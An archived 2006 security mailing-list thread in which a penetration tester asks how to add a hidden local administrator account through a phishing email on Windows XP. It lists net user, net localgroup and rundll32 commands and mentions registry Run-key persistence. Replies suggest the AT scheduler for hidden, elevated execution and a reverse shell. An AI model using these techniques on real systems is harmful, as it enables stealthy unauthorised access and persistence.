Re: add a local admin user without a pop-up ?

From: killy (killfactory@gmail.com)
Date: Wed Dec 06 2006 - 22:12:40 EST


this(AT command) has worked for me in hte past.

depending on the version or configuration of windows xp this technique
can be used for local privilege escalation by launching cmd with AT in
/interactive mode.
AT runs with elevated privileges.

deros,

look at the switchblade stuff @ hak5.org. since you are having the
user launch the software locally, maybe you can incorporate their
technique of hiding the prompts into your egg(package). though I like
Lee's approach.

Did you consider launching a reverse shell back to the attacking pc
and do it manually?

just an idea...

good luck, I am interested in the outcome also.

cheers............~

On 12/4/06, Lee Lawson <leejlawson@gmail.com> wrote:
> have you considered using the AT command to execute your DOS commands?
> This way, you can run it at a set time offset in the future (+5
> minutes etc) and I don't think that it executes visibly to the user,
> unless you use the /interactive switch.
>
> Have a go and let us know.
>
> Then let us know how you are executing the DOS from the email!
>
> later,
>
>
> On 12/1/06, me <deros68@yahoo.com> wrote:
> > We are conducting a pen test that allows social
> > engineering emails sent out that may allow us to take
> > over the the user who opens one of them. I created an
> > email hack but am now wondering how to add a local
> > admin user WITHOUT HAVING A DOS PROMPT POP UP WHEN THE
> > EMAIL IS OPENED.
> >
> > I cannot transport any files (of any sort - no wscript
> > file or vbs or any file!!) to the victim and I am
> > limited to the native XP commands and processes that
> > are on the victim machine. If I catch a victim (catch
> > & release) I will be able to reach the victim machine
> > with native XP means (net use - nc to ports etc..).
> > The victim then gets scolded about opening
> > inappropriate emails...
> >
> >
> > The victim is almost always an administrator or power
> > user so almost any command or process can be used. I
> > tried many/many variants of invoking the "Cmd.exe"
> > shell but so far it always creates a momentary DOS
> > screen pop-up.
> >
> > tired many variants similar to below:
> >
> > CMD.EXE /Q /C net user testx password /add
> > or
> > start /B /wait cmd /Q /C c:\windows\system32\net.exe
> > user testx password /add
> >
> > pop-ups in either case
> >
> > I have used rundll32.exe in the past to avoid pop-ups
> > (in most cases) so I tried:
> >
> > rundll32.exe netapi32.dll,NetUserAdd
> > (%COMPUTERNAME%,1,(NEWUSER,PASSWORD),0) (wrapped)
> >
> > I tried many variants of the above but I always get a
> > pop up "An Exception occurred while trying to run
> > netapi32.dll.."
> >
> > OK
> >
> > I plugged netapi32.dll into Olly and saw the dll entry
> > NetUserAdd takes 4 parms -but the 3rd parm
> > is a LBYTE pointer to the input buffer. I wonder if
> > rundll32.exe can construct such a pointer for me?
> >
> > Using only the programs and API calls available from
> > what is essentially an XP DOS shell - does anyone have
> > a better way to do this without creating a DOS pop-up
> > ?
> >
> > I have already figured out how to write the "net user
> > Username PSWD /add" & "net localgroup administrators
> > Username /add" cmds to the registry (the run key) -
> > without creating a pop-up! (Silently..)
> >
> > However, the problem with the above is that it
> > requires a logon/logoff or re-boot to occur before the
> > user is added. Thus my quest for a silent (no pop-up)
> > but immediate means to do this.
> >
> > Since the email interface can call a winapi - I may
> > have to try to call netapi32.dll/NetUserAdd - I hope
> > that I do not have to do that - the test may be over -
> > before I can decipher the correct syntax between my
> > email system and the STDCALL Winapi
> >
> > Thanks
> >
> >
> >
> >
> >
> > ____________________________________________________________________________________
> > Have a burning question?
> > Go to www.Answers.yahoo.com and get answers from real people who know.
> >
> > ------------------------------------------------------------------------
> > This List Sponsored by: Cenzic
> >
> > Need to secure your web apps?
> > Cenzic Hailstorm finds vulnerabilities fast.
> > Click the link to buy it, try it or download Hailstorm for FREE.
> > http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> > ------------------------------------------------------------------------
> >
> >
>
>
> --
> Lee J Lawson
> leejlawson@gmail.com
> leejlawson@hushmail.com
>
> "Give a man a fire, and he'll be warm for a day; set a man on fire,
> and he'll be warm for the rest of his life."
>
> "Quidquid latine dictum sit, altum sonatur."
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>

-- 
If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:25 EDT